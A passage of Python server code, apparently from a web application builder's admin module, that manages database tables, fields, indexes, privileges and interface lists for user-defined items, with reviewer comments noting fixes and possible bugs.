    if compressed_js != common.SETTINGS['COMPRESSED_JS']:
        task.app.task_client_modified = True
    if single_file_js != common.SETTINGS['SINGLE_FILE_JS']:
        task.app.task_client_modified = True
        task.app.task_server_modified = True
    if safe_mode != common.SETTINGS['SAFE_MODE']:
        task.safe_mode = common.SETTINGS['SAFE_MODE']
        # drop cached users so the new mode takes effect immediately
        task.app.users = {}
    if language != common.SETTINGS['LANGUAGE']:
        task.set_language(common.SETTINGS['LANGUAGE'])
        init_admin(task)
    if theme != common.SETTINGS['THEME'] or small_font != common.SETTINGS['SMALL_FONT']:
        change_theme(task)
    task.timeout = common.SETTINGS['TIMEOUT']
    task.ignore_change_ip = common.SETTINGS['IGNORE_CHANGE_IP']
    return result
def init_fields_next_id(task):
    """Synchronize the field-id generator in SYS_PARAMS with MAX(ID) of
    SYS_FIELDS, so newly reserved ids never collide with existing ones."""
    connection = task.create_connection()
    try:
        cursor = connection.cursor()
        cursor.execute('SELECT MAX(ID) FROM SYS_FIELDS')
        rows = cursor.fetchall()
        # MAX(ID) is NULL on an empty table - start the generator at 0
        next_id = rows[0][0] or 0
        cursor.execute('UPDATE SYS_PARAMS SET F_FIELD_ID_GEN=%s' % next_id)
        connection.commit()
    finally:
        connection.close()
def get_fields_next_id(task, length=1):
    # Reserve *length* consecutive field ids and return the first of them.
    # The read-increment-write of the generator value is serialized with
    # task.fields_id_lock so concurrent requests cannot get the same id.
    with task.fields_id_lock:
        params = task.sys_params.copy()
        params.open()
        cur_id = params.f_field_id_gen.value
        params.edit()
        params.f_field_id_gen.value = cur_id + length
        params.post()
        params.apply()
        return cur_id + 1
def server_get_table_names(task):
    """Return the sorted list of database tables not yet used by any item.

    Connects to the project database, lists its tables and filters out
    those already referenced in SYS_ITEMS (case-insensitive). On any
    failure an empty list is returned (best effort), but the error is
    printed instead of being silently swallowed.
    """
    db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
    db_module = db_modules.get_db_module(db_type)
    connection = db_module.connect(db_database, db_user, db_password, db_host, db_port, db_encoding, db_server)
    try:
        tables = db_module.get_table_names(connection)
        tables = [t.strip() for t in tables]
        ex_tables = task.select('SELECT F_TABLE_NAME FROM SYS_ITEMS')
        # set for O(1) membership tests instead of scanning a list
        ex_tables = set(t[0].upper() for t in ex_tables if t[0])
        result = [t for t in tables if not t.upper() in ex_tables]
        result.sort()
    except Exception:
        # Bug fix: was a bare `except:` that also swallowed SystemExit /
        # KeyboardInterrupt and hid the real error entirely. Keep the
        # best-effort empty result but report the failure.
        traceback.print_exc()
        result = []
    finally:
        connection.close()
    return result
def server_import_table(task, table_name):
    """Return the db module's introspection info for *table_name*.

    The connection is always closed, even when introspection raises.
    """
    db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
    db_module = db_modules.get_db_module(db_type)
    connection = db_module.connect(db_database, db_user, db_password, db_host, db_port, db_encoding, db_server)
    try:
        return db_module.get_table_info(connection, table_name, db_database)
    finally:
        connection.close()
def server_get_primary_key_type(task, lookup_item_id):
    # Return id/name/type/size of the lookup item's primary key field as a
    # dict, or a fallback when the item or field is missing.
    # NOTE(review): the fallback returns a 2-tuple (None, None) while the
    # success path returns a dict - callers must handle both shapes;
    # confirm this asymmetry is intended.
    items = task.sys_items.copy()
    items.set_where(id=lookup_item_id)
    items.open()
    if items.record_count():
        primary_field_id = items.f_primary_key.value
        fields = task.sys_fields.copy()
        fields.set_where(id=primary_field_id)
        fields.set_fields('id', 'f_field_name', 'f_data_type', 'f_size')
        fields.open()
        if fields.record_count():
            return {'field_id': fields.id.value, 'field_name': fields.f_field_name.value,
                'data_type': fields.f_data_type.value, 'size': fields.f_size.value}
    return None, None
def server_set_literal_case(task, name):
    """Return *name* converted to the identifier case convention of the
    project's database module."""
    info = db_info(task)
    db_module = db_modules.get_db_module(info[0])
    return db_module.identifier_case(name)
def get_new_table_name(task, var_name):
    # Build [table_name, generator_name] for a new item: the table name is
    # "<task_name>_<var_name>" in the database's identifier case; the
    # generator name gets a '_SEQ' suffix when the database needs one.
    db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
    db_module = db_modules.get_db_module(db_type)
    copy = task.sys_items.copy(handlers=False, details=False)
    copy.set_where(type_id=common.TASK_TYPE)
    copy.open();
    if copy.record_count() == 1:
        name = copy.f_item_name.value + '_' + var_name;
    # NOTE(review): if the task record is missing (record_count != 1),
    # `name` is unbound and the code below raises NameError - confirm a
    # single task record is guaranteed here.
    gen_name = ''
    if db_module.NEED_GENERATOR:
        gen_name = name + '_SEQ'
    return [db_module.identifier_case(name), db_module.identifier_case(gen_name)]
def create_system_item(task, field_name):
    # Create one of the built-in system items (history log or locks table,
    # selected by *field_name*), placing it in - and if necessary creating -
    # the "System" group, then build its db table and index and register it
    # in sys_params. Returns (result_message, error_message).
    def check_item_name(name):
        # Append a numeric suffix until the item name is unique.
        items = task.sys_items.copy()
        items.open(fields = ['id', 'f_item_name'])
        i = 1
        cur_name = name
        while True:
            if items.locate('f_item_name', cur_name):
                cur_name = name + str(i)
                i += 1
            else:
                break
        return cur_name
    error = ''
    result = ''
    try:
        items = task.sys_items.copy()
        items.set_where(type_id=common.TASK_TYPE)
        items.open(fields = ['id', 'type_id', 'f_item_name'])
        task_id = items.id.value
        task_name = items.f_item_name.value
        items = task.sys_items.copy()
        items.open(open_empty=True, fields = ['id', 'parent', 'task_id', \
            'type_id', 'f_name', 'f_item_name', 'f_table_name', \
            'f_gen_name', 'f_primary_key'])
        sys_group = None
        params = task.sys_params.copy()
        task.sys_params.open(fields=['id', 'f_sys_group', 'f_history_item', 'f_lock_item'])
        sys_group = task.sys_params.f_sys_group.value
        if sys_group:
            # verify the stored group id still points at an existing item
            items.set_where(id=sys_group)
            items.open(fields = ['id', 'f_name', 'f_item_name'])
            if not items.record_count():
                sys_group = None
        else:
            # create the System group and remember it in sys_params
            items.open(open_empty=True)
            items.append()
            items.parent.value = task_id
            items.task_id.value = task_id
            items.type_id.value = common.ITEMS_TYPE
            items.f_name.value = task.language('system_group')
            items.f_item_name.value = check_item_name('system')
            items.f_index.value = '999999'
            items.post()
            items.apply()
            task.sys_params.edit()
            task.sys_params.f_sys_group.value = items.id.value
            task.sys_params.post()
            task.sys_params.apply()
            sys_group = items.id.value
        sys_group_name = items.f_name.value
        # pick the definition of the requested system item
        if field_name == 'f_history_item':
            name = 'History'
            item_name = check_item_name('history')
            fields = common.HISTORY_FIELDS
            index_fields = common.HISTORY_INDEX_FIELDS
            param_field = 'f_history_item'
            sys_id = 1
        elif field_name == 'f_lock_item':
            name = 'Locks'
            item_name = check_item_name('locks')
            fields = common.LOCKS_FIELDS
            index_fields = common.LOCKS_INDEX_FIELDS
            param_field = 'f_lock_item'
            sys_id = 2
        table_name, gen_name = get_new_table_name(task, item_name)
        # create the item record together with its fields
        items.open(open_empty=True)
        items.append()
        items.parent.value = sys_group
        items.task_id.value = task_id
        items.type_id.value = common.ITEM_TYPE
        items.f_name.value = name
        items.f_item_name.value = item_name
        items.f_table_name.value = table_name
        items.f_gen_name.value = None
        items.sys_id.value = sys_id
        items.sys_fields.open()
        for i, f in enumerate(fields):
            field_name, data_type, size = f
            items.sys_fields.append()
            items.sys_fields.id.value = get_fields_next_id(task)
            items.sys_fields.task_id.value = task_id
            items.sys_fields.f_name.value = field_name
            items.sys_fields.f_field_name.value = field_name
            items.sys_fields.f_db_field_name.value = server_set_literal_case(task, field_name)
            items.sys_fields.f_data_type.value = data_type
            items.sys_fields.f_size.value = size
            items.sys_fields.post()
            if field_name == 'id':
                items.f_primary_key.value = items.sys_fields.id.value
        items.post()
        items.on_apply = items_apply_changes
        items.apply(params={'manual_update': False})
        sys_item_name = items.f_name.value
        # build the index over the configured index fields
        dest_list = []
        for field_name in index_fields:
            items.sys_fields.locate('f_field_name', field_name)
            dest_list.append([items.sys_fields.id.value, False])
        indexes = task.sys_indices.copy()
        indexes.open(open_empty=True)
        indexes.append()
        indexes.f_index_name.value = task_name.upper() + '_' + items.f_item_name.value.upper() + '_' + 'IDX';
        indexes.task_id.value = task_id
        indexes.owner_rec_id.value = items.id.value
        indexes.f_foreign_index.value = False
        indexes.f_fields_list.value = server_dump_index_fields(indexes, dest_list)
        indexes.post()
        indexes.on_apply = indices_apply_changes
        indexes.apply(params={'manual_update': False})
        # register the created item in sys_params
        task.sys_params.edit()
        task.sys_params.field_by_name(param_field).value = items.id.value
        task.sys_params.post()
        task.sys_params.apply()
    except Exception as e:
        traceback.print_exc()
        error = 'While creating an item the following error was raised: %s' % e
    if not error:
        result = 'The %s item has been created in the %s group. The Application builder will be reloaded.' % \
            (sys_item_name, sys_group_name)
    return result, error
def indexes_get_table_names(indexes):
    """Map the owner item id of every index in *indexes* to its db table name."""
    owner_ids = [rec.owner_rec_id.value for rec in indexes]
    items = indexes.task.sys_items.copy(handlers=False)
    items.set_where(id__in=owner_ids)
    items.open(fields=['id', 'f_table_name'])
    mapping = {}
    for rec in items:
        mapping[rec.id.value] = rec.f_table_name.value
    return mapping
def drop_indexes_sql(task):
    """Build the DROP INDEX statements for every index of the project.

    Foreign-key indexes are skipped on SQLite, where they have no
    separate database object.
    """
    db_type = get_db_type(task)
    db_module = db_modules.get_db_module(db_type)
    indexes = task.sys_indices.copy(handlers=False)
    indexes.open()
    table_names = indexes_get_table_names(indexes)
    statements = []
    for index in indexes:
        if index.f_foreign_index.value and db_module.DATABASE == 'SQLITE':
            continue
        table_name = table_names.get(index.owner_rec_id.value)
        if table_name:
            statements.append(index.delete_index_sql(db_type, table_name))
    return statements
def restore_indexes_sql(task):
    """Build the CREATE INDEX statements for every index of the project.

    Mirror of drop_indexes_sql: foreign-key indexes are skipped on SQLite.
    """
    db_type = get_db_type(task)
    db_module = db_modules.get_db_module(db_type)
    indexes = task.sys_indices.copy(handlers=False)
    indexes.open()
    table_names = indexes_get_table_names(indexes)
    statements = []
    for index in indexes:
        if index.f_foreign_index.value and db_module.DATABASE == 'SQLITE':
            continue
        table_name = table_names.get(index.owner_rec_id.value)
        if table_name:
            statements.append(index.create_index_sql(db_type, table_name))
    return statements
###############################################################################
# sys_items #
###############################################################################
def get_db_type(task):
    """Return the project database type id stored in the sys_tasks record."""
    record = task.sys_tasks.copy()
    record.open()
    return record.f_db_type.value
def get_table_fields(item, fields, delta_fields=None):
    # Build the list of field dicts describing *item*'s db table columns:
    # the parent group's fields plus the item's own, optionally merged with
    # a pending delta (inserted/modified/deleted field records). Calculated
    # and master fields never map to columns and are excluded.
    def field_dict(field):
        # Column description for one field; None for calculated/master fields.
        if not (field.f_calculated.value or field.f_master_field.value):
            dic = {}
            dic['id'] = field.id.value
            dic['field_name'] = field.f_db_field_name.value
            dic['data_type'] = field.f_data_type.value
            dic['size'] = field.f_size.value
            dic['default_value'] = ''#field.f_default_value.value
            dic['master_field'] = field.f_master_field.value
            dic['primary_key'] = field.id.value == item.f_primary_key.value
            return dic
    def field_info(fields):
        result = []
        for field in fields:
            if not (field.f_calculated.value or field.f_master_field.value):
                dic = field_dict(field)
                if dic:
                    result.append(dic)
        return result
    def find_field(fields_info, field_id):
        for field in fields_info:
            if field['id'] == field_id:
                return field
    task = item.task
    result = []
    parent_fields = task.sys_fields.copy()
    parent_fields.filters.owner_rec_id.value = [fields.owner.parent.value]
    parent_fields.open()
    result = field_info(parent_fields) + field_info(fields)
    if delta_fields:
        # merge the pending changes into the snapshot
        # NOTE: the local name `field_info` below shadows the helper above;
        # the helper is no longer needed at this point
        for field in delta_fields:
            if not (field.f_calculated.value or field.f_master_field.value):
                if field.record_status == common.RECORD_INSERTED:
                    dic = field_dict(field)
                    if dic:
                        result.append(dic)
                if field.record_status == common.RECORD_DELETED:
                    field_info = find_field(result, field.id.value)
                    if field_info:
                        result.remove(field_info)
                elif field.record_status == common.RECORD_MODIFIED:
                    field_info = find_field(result, field.id.value)
                    if field_info:
                        field_info['id'] = field.id.value
                        field_info['field_name'] = field.f_db_field_name.value
                        field_info['data_type'] = field.f_data_type.value
                        field_info['size'] = field.f_size.value
                        field_info['default_value'] = ''#field.f_default_value.value
                    else:
                        dic = field_dict(field)
                        if dic:
                            result.append(dic)
            elif field.f_master_field.value and field.record_status == common.RECORD_MODIFIED:
                # a field turned into a master field loses its column
                field_info = find_field(result, field.id.value)
                if field_info and not field_info['master_field']:
                    result.remove(field_info)
    return result
def item_children(task, item_id):
    """Return an open sys_items copy holding the direct children of *item_id*."""
    children = task.sys_items.copy()
    children.filters.parent.value = item_id
    children.open()
    return children
def get_system_fields(item):
    """Return the field names of *item*'s system fields.

    System fields are those referenced by the primary-key, deleted-flag,
    master-id and master-rec-id attributes; an empty list when none are set.
    """
    field_ids = []
    for attr in ('f_primary_key', 'f_deleted_flag', 'f_master_id', 'f_master_rec_id'):
        value = item.field_by_name(attr).value
        if value:
            field_ids.append(value)
    names = []
    if field_ids:
        fields = item.task.sys_fields.copy()
        fields.set_where(id__in=field_ids)
        fields.open()
        for f in fields:
            names.append(f.f_field_name.value)
    return names
def update_interface(delta, type_id, item_id):
    # Keep the item's stored view/edit/order field lists in sync with
    # field changes in *delta*: inserted fields are appended to the view
    # and edit lists (system fields excluded), deleted fields are removed
    # from all three lists.
    def delete_id_from_list(id_list, id_value):
        return [id_it for id_it in id_list if id_it[0] != id_value]
    task = delta.task
    if type_id in (common.ITEM_TYPE, common.TABLE_TYPE) and \
        delta.details.sys_fields.record_count():
        item = task.sys_items.copy()
        item.filters.id.value = item_id
        item.open()
        system_fields = get_system_fields(item)
        fields = task.sys_fields.copy()
        fields.filters.owner_rec_id.value = [item_id, item.parent.value]
        fields.open()
        common.load_interface(item)  # fills item._view_list/_edit_list/_order_list
        if delta.record_status == common.RECORD_INSERTED:
            # a brand-new item starts with all inherited (group) fields
            for field in fields:
                if field.owner_rec_id.value == item.parent.value:
                    if not field.f_field_name.value in system_fields:
                        if type(item._view_list) is list:
                            item._view_list.append([field.id.value, False, False, False])
                        if type(item._edit_list) is list:
                            item._edit_list.append([field.id.value])
        for d in delta.details.sys_fields:
            if d.record_status in [common.RECORD_INSERTED, common.RECORD_DELETED]:
                field_name = d.f_field_name.value
                # locate positions the `fields` cursor on the named field,
                # so fields.id.value below is that field's id
                if fields.locate('f_field_name', field_name):
                    if d.record_status == common.RECORD_INSERTED:
                        if not field_name in system_fields:
                            if type(item._view_list) is list:
                                item._view_list.append([fields.id.value, False, False, False])
                            if type(item._edit_list) is list:
                                item._edit_list.append([fields.id.value])
                    elif d.record_status == common.RECORD_DELETED:
                        if type(item._view_list) is list:
                            item._view_list = delete_id_from_list(item._view_list, fields.id.value)
                        if type(item._edit_list) is list:
                            item._edit_list = delete_id_from_list(item._edit_list, fields.id.value)
                        item._order_list = delete_id_from_list(item._order_list, fields.id.value)
        common.store_interface(item)
def change_item_sql(item, old_fields, new_fields):
    """Build the ALTER-table SQL that migrates *item* from *old_fields* to
    *new_fields*, using the DDL dialect of the task's database."""
    return item.change_table_sql(get_db_type(item.task), old_fields, new_fields)
def update_table(delta):
    """Return True if applying *delta* requires touching a physical database
    table (i.e. the item is not virtual and not a group/report type).

    Idiom fix: the original `if cond: return False else: return True` is
    collapsed into a single boolean expression with identical results.
    """
    return not (delta.f_virtual_table.value or
                delta.type_id.value in (common.ITEMS_TYPE, common.TABLES_TYPE, common.REPORTS_TYPE))
def init_priviliges(item, item_id):
    """Reset privileges for item *item_id*: delete any existing rows, then
    grant full view/create/edit/delete rights to every role.

    NOTE: the name keeps the historical misspelling ("priviliges") because it
    is referenced elsewhere in the codebase.
    """
    # Raw DELETE first so re-initialization is idempotent.
    item.task.execute('DELETE FROM SYS_PRIVILEGES WHERE ITEM_ID = %s' % item_id)
    priv = item.task.sys_privileges.copy(handlers=False)
    priv.open(open_empty=True)
    roles = item.task.sys_roles.copy(handlers=False)
    roles.open()
    for r in roles:
        priv.append()
        # r.ID is the sys_roles item type id; r.id.value is this role's record id.
        priv.owner_id.value = r.ID
        priv.owner_rec_id.value = r.id.value
        priv.item_id.value = item_id
        priv.f_can_view.value = True
        priv.f_can_create.value = True
        priv.f_can_edit.value = True
        priv.f_can_delete.value = True
        priv.post()
    priv.apply()
def items_insert_sql(item, delta, manual_update=False, new_fields=None, foreign_fields=None):
    """Return the CREATE TABLE SQL for a newly inserted item, or None when no
    physical table must be created (virtual table, group type, or manual
    database management).
    """
    if update_table(delta) and not manual_update:
        if delta.type_id.value in (common.ITEM_TYPE, common.TABLE_TYPE):
            db_type = get_db_type(item.task)
            fields = new_fields
            if not fields:
                # Derive the column list from the delta's field detail records.
                fields = get_table_fields(delta, delta.details.sys_fields)
            sql = delta.create_table_sql(db_type, delta.f_table_name.value, \
                fields, delta.f_gen_name.value, foreign_fields=foreign_fields)
            return sql
def items_execute_insert(item, delta, manual_update):
    """Apply an inserted item: create its table (if needed), save the metadata
    record, then initialize privileges and the interface lists.

    Raises Exception when table creation fails in the project database.
    """
    sql = items_insert_sql(item, delta, manual_update)
    if sql:
        error = execute(item.task, delta.task_id.value, sql)
        if error:
            raise Exception(item.task.language('error_creating_table') % (error))
    sql = delta.apply_sql()
    result = item.task.execute(sql)
    # execute() returns per-statement results; pull the new record id out of
    # the first statement's change log.
    exec_result = result[0]
    result_id = exec_result['changes'][0]['rec_id']
    init_priviliges(item, result_id)
    update_interface(delta, delta.type_id.value, result_id)
    return result
def items_update_sql(item, delta, manual_update=False):
    """Return the ALTER TABLE SQL for a modified item, or None when the change
    does not affect a physical table (no field changes, virtual table, or
    manual database management).
    """
    if update_table(delta) and not manual_update:
        if delta.type_id.value in (common.ITEMS_TYPE, common.TABLES_TYPE,
            common.ITEM_TYPE, common.TABLE_TYPE) and \
            delta.details.sys_fields.record_count():
            # Load the current (pre-change) field set from the database.
            it = item.copy()
            it.filters.id.value = delta.id.value
            it.open()
            it_fields = it.details.sys_fields
            it_fields.open()
            old_fields = get_table_fields(delta, it_fields)
            # New field set = current fields merged with the delta's changes.
            new_fields = get_table_fields(delta, it_fields, delta.details.sys_fields)
            sql = change_item_sql(delta, old_fields, new_fields)
            return sql
def items_execute_update(item, delta, manual_update):
    """Apply a modified item: alter its table (if needed), save the metadata
    record, and refresh the stored interface lists.

    Raises Exception when the table modification fails in the project database.
    """
    sql = items_update_sql(item, delta, manual_update)
    if sql:
        error = execute(item.task, delta.task_id.value, sql)
        if error:
            raise Exception(item.task.language('error_modifying_table') % error)
    sql = delta.apply_sql()
    result = item.task.execute(sql)
    update_interface(delta, delta.type_id.value, delta.id.value)
    return result
def items_delete_sql(item, delta, manual_update=False):
    """Return the DROP TABLE SQL for a deleted item, or None when no physical
    table has to be dropped."""
    if update_table(delta) and not manual_update:
        if delta.type_id.value in (common.ITEM_TYPE, common.TABLE_TYPE):
            db_type = get_db_type(item.task)
            sql = delta.delete_table_sql(db_type)
            return sql
def sys_item_deleted_sql(delta):
    """Return the SYS_PARAMS cleanup statements needed when the deleted item
    is referenced as history item, lock item or system group."""
    sys_params = delta.task.sys_params.copy()
    sys_params.open()
    cleanups = (
        (sys_params.f_history_item.value, 'UPDATE SYS_PARAMS SET F_HISTORY_ITEM=NULL'),
        (sys_params.f_lock_item.value, 'UPDATE SYS_PARAMS SET F_LOCK_ITEM=NULL'),
        (sys_params.f_sys_group.value, 'UPDATE SYS_PARAMS SET F_SYS_GROUP=NULL'),
    )
    return [sql for referenced_id, sql in cleanups if delta.id.value == referenced_id]
def items_execute_delete(item, delta, manual_update):
    """Apply a deleted item: drop its table (if needed), then remove the
    metadata record together with its filters, indexes, report params and any
    SYS_PARAMS references, all in one execute() batch.

    Raises Exception when dropping the table fails in the project database.
    """
    sql = items_delete_sql(item, delta, manual_update)
    if sql:
        error = execute(item.task, delta.task_id.value, sql)
        if error:
            raise Exception(item.task.language('error_deleting_table') % (delta.table_name.upper(), error))
    commands = []
    sql = delta.apply_sql()
    commands.append(sql)
    # Cascade-delete dependent metadata rows.
    for it in (item.task.sys_filters, item.task.sys_indices, item.task.sys_report_params):
        commands.append('DELETE FROM %s WHERE OWNER_REC_ID = %s' % (it.table_name.upper(), delta.id.value))
    commands = commands + sys_item_deleted_sql(delta)
    result = item.task.execute(commands)
    return result
def items_apply_changes(item, delta, params):
    """on_apply handler for sys_items: route the delta to the insert/update/
    delete executor, mark the task server as modified and invalidate the
    privileges cache.

    Raises Exception when any changed field record is missing an id.
    """
    manual_update = params['manual_update']
    for f in delta.sys_fields:
        if not f.id.value:
            raise Exception(item.task.language('field_no_id') % (f.field_name))
    # Bug fix: `result` was unbound (UnboundLocalError at the return) when the
    # delta was neither inserted, modified nor deleted; default to None.
    result = None
    if delta.rec_inserted():
        result = items_execute_insert(item, delta, manual_update)
    elif delta.rec_modified():
        result = items_execute_update(item, delta, manual_update)
    elif delta.rec_deleted():
        result = items_execute_delete(item, delta, manual_update)
    item.task.app.task_server_modified = True
    roles_changed(item)
    return result
def do_on_apply_changes(item, delta, params):
    """Default on_apply handler: execute the delta's own SQL and flag the
    task server as modified."""
    outcome = item.task.execute(delta.apply_sql())
    item.task.app.task_server_modified = True
    return outcome
def server_group_is_empty(item, id_value):
    """Return True when no sys_items record has *id_value* as its parent."""
    children = item.task.sys_items.copy()
    children.set_where(parent=id_value)
    children.open()
    return not children.record_count()
def server_can_delete(item, id_value):
    """Check whether item *id_value* may be deleted.

    Returns an HTML error message describing the blocking references (detail
    usage, lookup fields, report params, or child details), or None when
    deletion is allowed.
    """
    item = item.copy()
    item.set_where(id=id_value)
    item.open()
    # 1. Items that use this item as a detail table.
    details = item.task.sys_items.copy()
    details.filters.table_id.value = id_value
    details.open()
    used = []
    for d in details:
        used.append({'item1': item.task.sys_items.field_by_id(d.parent.value, 'f_item_name'), 'item2': d.f_item_name.value})
    if len(used) != 0:
        names = ',<br>'.join(['<b>%(item1)s</b> - <b>%(item2)s</b>' % use for use in used])
        mess = item.task.language('item_used_in_items') % {'item': item.f_item_name.value, 'items': names}
        return mess
    # 2. Lookup fields pointing at this item.
    fields = item.task.sys_fields.copy()
    fields.open()
    used = []
    for f in fields:
        if f.f_object.value == id_value:
            used.append({'field1': item.task.sys_items.field_by_id(f.owner_rec_id.value, 'f_item_name'), 'field2': f.f_field_name.value})
    if len(used) != 0:
        names = ',<br>'.join(['<b>%(field1)s</b> - <b>%(field2)s</b>' % use for use in used])
        mess = item.task.language('item_used_in_fields') % {'item': item.f_item_name.value, 'fields': names}
        return mess
    # 3. Report parameters pointing at this item.
    params = item.task.sys_report_params.copy()
    params.open()
    used = []
    for p in params:
        if p.f_object.value == id_value:
            used.append({'param1': item.task.sys_items.field_by_id(p.owner_rec_id.value, 'f_item_name'), 'param2': p.f_param_name.value})
    if len(used) != 0:
        names = ',<br>'.join(['<b>%(param1)s</b> - <b>%(param2)s</b>' % use for use in used])
        mess = item.task.language('item_used_in_params') % {'item': item.f_item_name.value, 'params': names}
        return mess
    # 4. Child items (details) owned by this item.
    details = item.task.sys_items.copy()
    details.set_filters(parent=id_value)
    details.open()
    if details.record_count():
        mess = "Can't delete item: item contains details"
        return mess
def server_load_interface(item, id_value):
    """Load and return the stored interface lists (view/edit/order/reports)
    for item record *id_value*."""
    record = item.copy()
    record.set_where(id=id_value)
    record.open(fields=['id', 'f_info'])
    common.load_interface(record)
    return {key: getattr(record, attr) for key, attr in (
        ('view_list', '_view_list'),
        ('edit_list', '_edit_list'),
        ('order_list', '_order_list'),
        ('reports_list', '_reports_list'),
    )}
def server_store_interface(item, id_value, info):
    """Persist the interface lists from *info* onto item record *id_value*
    and flag the task server as modified."""
    record = item.copy()
    record.set_where(id=id_value)
    record.open(fields=['id', 'f_info'])
    for attr, key in (('_view_list', 'view_list'),
                      ('_edit_list', 'edit_list'),
                      ('_order_list', 'order_list'),
                      ('_reports_list', 'reports_list')):
        setattr(record, attr, info[key])
    common.store_interface(record)
    record.task.app.task_server_modified = True
def create_detail_index(task, table_id):
    """Ensure a (master_id, master_rec_id) index exists for detail table
    *table_id*; create and apply one if it is missing.

    No-op when the table has no master field (i.e. it is not a detail).
    """
    # The task item supplies the prefix for the generated index name.
    items = task.sys_items.copy()
    items.set_where(type_id=common.TASK_TYPE)
    items.open(fields = ['id', 'type_id', 'f_item_name'])
    task_id = items.id.value
    task_name = items.f_item_name.value
    tables = task.sys_items.copy(handlers=False)
    tables.set_where(id=table_id)
    tables.open()
    if not tables.f_master_id.value:
        return
    # Look for an existing non-foreign index whose first two fields are
    # (master_id, master_rec_id).
    found = False
    indexes = task.sys_indices.copy(handlers=False)
    indexes.set_where(owner_rec_id=table_id)
    indexes.open()
    for i in indexes:
        if not i.f_foreign_index.value:
            field_list = common.load_index_fields(i.f_fields_list.value)
            if len(field_list) >= 2 and \
                field_list[0][0] == tables.f_master_id.value and \
                field_list[1][0] == tables.f_master_rec_id.value:
                found = True
    if not found:
        dest_list = [[tables.f_master_id.value, False], [tables.f_master_rec_id.value, False]]
        indexes.append()
        index_name = task_name.upper() + '_' + tables.f_item_name.value.upper()
        # Keep the generated name short enough for restrictive databases.
        if len(index_name) > 20:
            index_name = index_name[0:20]
        indexes.f_index_name.value = index_name + '_DETAIL_' + 'IDX';
        indexes.task_id.value = task_id
        indexes.owner_rec_id.value = table_id
        indexes.f_foreign_index.value = False
        indexes.f_fields_list.value = server_dump_index_fields(indexes, dest_list)
        indexes.post()
        indexes.on_apply = indices_apply_changes
        indexes.apply(params={'manual_update': False})
def server_update_details(item, item_id, dest_list):
    """Synchronize the detail items of item *item_id* with *dest_list*
    (a list of [table_id, ...] rows in the desired order).

    Removes details no longer in the list, creates missing ones (copying the
    table's interface lists and privileges), renumbers f_index to match the
    requested order, and rewrites the item's stored view/edit detail lists to
    use the detail item ids.
    """
    def get_table_info(table_id):
        # Return (caption, item name, db table name) of the referenced table.
        items = item.copy()
        items.set_where(id=table_id)
        items.open()
        return items.f_name.value, items.f_item_name.value, items.f_table_name.value
    def convert_details(i_list, attr, detail_list):
        # Filter every interface entry's detail-id list down to ids that still
        # exist; best-effort — malformed entries are skipped silently.
        try:
            for media, options in iteritems(i_list):
                try:
                    new = []
                    details = options[1].get(attr)
                    if details:
                        for d in detail_list:
                            if d in details:
                                new.append(d)
                        options[1][attr] = new
                except:
                    pass
        except:
            pass
        return i_list
    detail_list = [d[0] for d in dest_list]
    items = item.copy(handlers=False)
    items.set_where(parent=item_id)
    items.open()
    # First pass: keep details that are still requested (removing them from
    # dest_list so only the new ones remain), delete the rest.
    while not items.eof():
        cur_row = [row for row in dest_list if row[0] == items.table_id.value]
        if len(cur_row) == 1:
            dest_list.remove(cur_row[0])
            items.next()
        else:
            items.delete()
    items.apply()
    item = item.copy(handlers=False)
    item.set_where(id=item_id)
    item.open()
    # Second pass: create the details that were not present yet.
    for row in dest_list:
        table_id = row[0]
        name, obj_name, table_name = get_table_info(table_id)
        items.append()
        items.task_id.value = item.task_id.value
        items.type_id.value = common.DETAIL_TYPE
        items.table_id.value = table_id
        items.parent.value = item.id.value
        items.f_name.value = name
        items.f_item_name.value = obj_name
        items.f_table_name.value = table_name
        items.f_visible.value = True
        items.f_info.value = ''
        items.post()
        # New details inherit the source table's interface lists.
        table = item.task.sys_items.copy()
        table.set_where(id=table_id)
        table.open()
        common.load_interface(table)
        items._view_list = table._view_list
        items._edit_list = table._edit_list
        items._order_list = table._order_list
        items._reports_list = []
        common.store_interface(items)
        items.apply()
        init_priviliges(items, items.id.value)
        try:
            create_detail_index(items.task, table_id)
        except Exception as e:
            traceback.print_exc()
        item.task.app.task_server_modified = True
    # Renumber f_index so details appear in the order requested by the client.
    items.set_order_by(['f_index'])
    items.set_where(parent=item_id)
    items.open()
    for it in items:
        cur_row = [i for i, row in enumerate(detail_list) if row == items.table_id.value]
        if len(cur_row) == 1:
            it.edit()
            it.f_index.value = cur_row[0]
            it.post()
    items.apply()
    # Rewrite the stored interface detail references with the detail item ids.
    items.set_order_by(['f_index'])
    items.set_where(parent=item_id)
    items.open()
    detail_list = []
    for it in items:
        detail_list.append(it.id.value)
    common.load_interface(item)
    item._view_list = convert_details(item._view_list, 'view_detail', detail_list)
    item._edit_list = convert_details(item._edit_list, 'edit_details', detail_list)
    common.store_interface(item)
###############################################################################
# sys_fields #
###############################################################################
def server_can_delete_field(item, id_value):
    """Check whether field record *id_value* may be deleted.

    Returns an HTML error message listing blocking references (group members,
    lookup fields, indexes, or filters that use the field), or None when
    deletion is allowed.
    """
    item = item.copy()
    item.set_where(id=id_value)
    item.open()
    # Group fields cannot be removed while the group still has items.
    item_type_id = item.task.sys_items.field_by_id(item.owner_rec_id.value, 'type_id')
    if item_type_id in (common.ITEMS_TYPE, common.TABLES_TYPE):
        if not server_group_is_empty(item, item.owner_rec_id.value):
            mess = "Can't delete the field: the group contains items."
            return mess
    # 1. Lookup fields that reference this field.
    field_id = item.id.value
    fields = item.task.sys_fields.copy()
    fields.set_filters(task_id=item.task_id.value)
    fields.open()
    used = []
    for f in fields:
        if f.f_object_field.value == field_id:
            used.append((item.task.sys_items.field_by_id(f.owner_rec_id.value, 'f_item_name'),
                f.f_field_name.value))
    if len(used) != 0:
        names = ',<br>'.join(['<p>%s - %s</p>' % use for use in used])
        mess = item.task.language('field_used_in_fields') % \
            {'field': item.f_field_name.value, 'fields': names}
        return mess
    # 2. Indexes (foreign or regular) that include this field.
    field_id = item.id.value
    indices = item.task.sys_indices.copy()
    indices.filters.owner_rec_id.value = item.owner_rec_id.value
    indices.open()
    ind_list = []
    for ind in indices:
        if ind.f_foreign_index.value:
            if ind.f_foreign_field.value == field_id:
                ind_list.append(ind.f_index_name.value)
        else:
            field_list = common.load_index_fields(ind.f_fields_list.value)
            for fld in field_list:
                if fld[0] == field_id:
                    ind_list.append(ind.f_index_name.value)
    if len(ind_list):
